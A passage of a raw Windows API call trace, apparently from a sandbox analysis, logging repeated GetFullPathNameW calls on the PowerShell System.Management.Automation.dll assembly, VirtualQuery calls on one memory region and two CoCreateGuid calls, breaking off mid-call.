[0085.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.499] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.500] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.500] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.501] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.501] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.502] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.502] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.502] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.502] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.503] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.503] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.504] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.504] VirtualQuery (in: lpAddress=0xeb780, lpBuffer=0xec640, dwLength=0x30 | out: lpBuffer=0xec640*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.504] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.505] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.505] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.506] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.506] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0xc40ec628, Data2=0xa4f8, Data3=0x4b6a, Data4=([0]=0x87, [1]=0x21, [2]=0x2, [3]=0x78, [4]=0x6f, [5]=0x77, [6]=0x5c, [7]=0xd3))) returned 0x0 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xebe10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.511] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.511] VirtualQuery (in: lpAddress=0xebb50, lpBuffer=0xeca10, dwLength=0x30 | out: lpBuffer=0xeca10*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.511] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.511] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.512] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.512] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.512] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.512] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.512] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.512] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.512] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.512] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.513] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.513] VirtualQuery (in: lpAddress=0xeb780, lpBuffer=0xec640, dwLength=0x30 | out: lpBuffer=0xec640*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.513] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.513] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.513] VirtualQuery (in: lpAddress=0xebab0, lpBuffer=0xec970, dwLength=0x30 | out: lpBuffer=0xec970*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.513] VirtualQuery (in: lpAddress=0xebb40, lpBuffer=0xeca00, dwLength=0x30 | out: lpBuffer=0xeca00*(BaseAddress=0xeb000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0085.513] CoCreateGuid (in: pguid=0xed330 | out: pguid=0xed330*(Data1=0x4d560e81, Data2=0x8352, Data3=0x4963, Data4=([0]=0xb8, [1]=0x3, [2]=0x7a, [3]=0xe2, [4]=0x45, [5]=0x18, [6]=0x8f, [7]=0x62))) returned 0x0 [0085.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xec360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0085.514] GetFullPathNameW (in: 